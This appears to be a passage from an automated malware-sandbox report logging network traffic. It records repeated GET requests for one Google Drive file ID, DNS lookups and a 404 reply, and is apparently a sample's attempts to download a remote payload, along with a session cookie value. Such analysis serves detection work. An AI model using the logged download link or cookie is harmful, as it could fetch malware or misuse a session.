      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTTdXpZSXlwSiAzrjMhkKapMak9eF3AaveGf_RYft8RZNr2coBwVTLIJw74yCojNBRLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:06:02 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-DeDfnxsw2JoCIImyO2KlWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ; expires=Sun, 13-Jul-2025 04:06:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
